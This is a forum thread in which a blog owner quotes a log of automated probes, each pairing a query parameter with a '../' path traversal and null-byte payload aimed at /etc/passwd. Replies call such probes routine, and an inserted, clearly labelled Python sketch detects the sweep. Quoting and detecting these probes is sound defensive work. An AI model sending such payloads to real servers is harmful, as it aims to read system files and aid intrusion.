Greenguy's Board


Old 2014-11-13, 04:23 AM   #1
ecchi
Hack Attack

Just looked at my stats for yesterday on one of my blogs (http://genuinebondage.com/). There is a whole pile of hits to the main page carrying data for things that simply do not exist on my site. I'm guessing that they think it is WordPress or similar and are trying to hack into the admin area. It is not; it is a script I wrote myself. But I would like to know what is going on. Can anyone tell from the following details what is happening? (The attacks were on the main index page; my stats display everything in the URL after the domain name, i.e. "/?acion=../../../../../../../../../../etc/passwd%00 - 1" means one hit on http://genuinebondage.com/?acion=../../../../../../../../../../etc/passwd%00 .)

Quote:
/?acion=../../../../../../../../../../etc/passwd%00 - 1
/?act=../../../../../../../../../../etc/passwd%00 - 1
/?action=../../../../../../../../../../etc/passwd%00 - 1
/?API_HOME_DIR=../../../../../../../../../../etc/passwd%00 - 1
/?board=../../../../../../../../../../etc/passwd%00 - 1
/?cat=../../../../../../../../../../etc/passwd%00 - 1
/?client_id=../../../../../../../../../../etc/passwd%00 - 1
/?cmd=../../../../../../../../../../etc/passwd%00 - 1
/?cont=../../../../../../../../../../etc/passwd%00 - 1
/?current_frame=../../../../../../../../../../etc/passwd%00 - 1
/?date=../../../../../../../../../../etc/passwd%00 - 1
/?detail=../../../../../../../../../../etc/passwd%00 - 1
/?dir=../../../../../../../../../../etc/passwd%00 - 1
/?display=../../../../../../../../../../etc/passwd%00 - 1
/?download=../../../../../../../../../../etc/passwd%00 - 1
/?f=../../../../../../../../../../etc/passwd%00 - 1
/?file=../../../../../../../../../../etc/passwd%00 - 1
/?fileinclude=../../../../../../../../../../etc/passwd%00 - 1
/?filename=../../../../../../../../../../etc/passwd%00 - 1
/?firm_id=../../../../../../../../../../etc/passwd%00 - 1
/?g=../../../../../../../../../../etc/passwd%00 - 1
/?getdata=../../../../../../../../../../etc/passwd%00 - 1
/?go=../../../../../../../../../../etc/passwd%00 - 1
/?HT=../../../../../../../../../../etc/passwd%00 - 1
/?idd=../../../../../../../../../../etc/passwd%00 - 1
/?inc=../../../../../../../../../../etc/passwd%00 - 1
/?incfile=../../../../../../../../../../etc/passwd%00 - 1
/?incl=../../../../../../../../../../etc/passwd%00 - 1
/?include_file=../../../../../../../../../../etc/passwd%00 - 1
/?include_path=../../../../../../../../../../etc/passwd%00 - 1
/?infile=../../../../../../../../../../etc/passwd%00 - 1
/?info=../../../../../../../../../../etc/passwd%00 - 1
/?lang=../../../../../../../../../../etc/passwd%00 - 1
/?language=../../../../../../../../../../etc/passwd%00 - 1
/?link=../../../../../../../../../../etc/passwd%00 - 1
/?main=../../../../../../../../../../etc/passwd%00 - 1
/?mainspot=../../../../../../../../../../etc/passwd%00 - 1
/?msg=../../../../../../../../../../etc/passwd%00 - 1
/?num=../../../../../../../../../../etc/passwd%00 - 1
/?openfile=../../../../../../../../../../etc/passwd%00 - 1
/?p=../../../../../../../../../../etc/passwd%00 - 1
/?page=../../../../../../../../../../etc/passwd%00 - 1
/?pagina=../../../../../../../../../../etc/passwd%00 - 1
/?path_to_calendar=../../../../../../../../../../etc/passwd%00 - 1
/?pg=../../../../../../../../../../etc/passwd%00 - 1
/?plik../../../../../../../../../../etc/passwd%00 - 1
/?qry_str=../../../../../../../../../../etc/passwd%00 - 1
/?ruta=../../../../../../../../../../etc/passwd%00 - 1
/?safehtml=../../../../../../../../../../etc/passwd%00 - 1
/?section=../../../../../../../../../../etc/passwd%00 - 1
/?showfile=../../../../../../../../../../etc/passwd%00 - 1
/?side=../../../../../../../../../../etc/passwd%00 - 1
/?site_id=../../../../../../../../../../etc/passwd%00 - 1
/?skin=../../../../../../../../../../etc/passwd%00 - 1
/?static=../../../../../../../../../../etc/passwd%00 - 1
/?strona=../../../../../../../../../../etc/passwd%00 - 1
/?sub=../../../../../../../../../../etc/passwd%00 - 1
/?tresc=../../../../../../../../../../etc/passwd%00 - 1
/?url=../../../../../../../../../../etc/passwd%00 - 1
/?user=../../../../../../../../../../etc/passwd%00 - 1
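Added example (not part of the original posts): every line quoted above pairs a `../` directory-traversal sequence and a URL-encoded null byte (`%00`) with a different query parameter name, all aimed at `/etc/passwd`. The Python sketch below reads stats lines in that `<path> - <hits>` format and reports any payload that was tried against several parameter names, which is the signature of an automated sweep rather than ordinary traffic. The sample lines are constructed, the names `classify` and `find_sweeps` are illustrative, and it assumes one parameter per request, as in the quoted lines.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample lines in the same "<path> - <hits>" format as the quoted stats.
SAMPLE_STATS = """\
/?action=../../../../../../../../../../etc/passwd%00 - 1
/?file=../../../../../../../../../../etc/passwd%00 - 1
/?page=../../../../../../../../../../etc/passwd%00 - 1
/?plik../../../../../../../../../../etc/passwd%00 - 1
/?p=123 - 14
/?page=2 - 9
/about.html - 3
"""

LINE_RE = re.compile(r"^(?P<uri>\S+) - (?P<hits>\d+)$")
TRAVERSAL_RE = re.compile(r"(?:\.\./){2,}")  # two or more consecutive "../"


def classify(uri):
    """Return (parameter, payload, signals) for one request path."""
    decoded = unquote(uri.partition("?")[2])  # %00 becomes a literal NUL
    signals = set()
    hit = TRAVERSAL_RE.search(decoded)
    if hit:
        signals.add("traversal")
    if "\x00" in decoded:
        signals.add("null-byte")
    if not hit:
        name, _, value = decoded.partition("=")
        return name, value, signals
    # Split where the traversal starts, so a malformed probe with no "="
    # (like the "plik" line) is still attributed to its parameter name.
    return decoded[:hit.start()].rstrip("="), decoded[hit.start():], signals


def find_sweeps(stats_text, min_params=3):
    """Map each traversal+NUL payload to the parameter names it was tried on,
    keeping only payloads seen with at least min_params distinct names."""
    by_payload = defaultdict(set)
    for line in stats_text.splitlines():
        row = LINE_RE.match(line.strip())
        if not row:
            continue
        param, payload, signals = classify(row["uri"])
        if {"traversal", "null-byte"} <= signals:
            by_payload[payload].add(param)
    return {p: sorted(n) for p, n in by_payload.items() if len(n) >= min_params}
```

On the sample, `find_sweeps(SAMPLE_STATS)` returns one payload mapped to four parameter names, while the ordinary `/?p=123` and `/?page=2` hits are ignored.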
Old 2014-11-13, 09:05 AM   #2
Cleo
I see stuff like that on just about all my domains.
Old 2014-11-14, 02:40 PM   #3
housekeeper
As Cleo said, those are pretty commonplace, but I would say more geared towards pay sites than blogs. To my knowledge they are PHP-generated scripts that are just run randomly. I've never experienced problems with them over the years, as they mainly target directories that don't exist, or try to pull random information.
Old 2014-11-18, 03:18 PM   #4
ecchi
Thanks.
All times are GMT -4. The time now is 08:06 AM.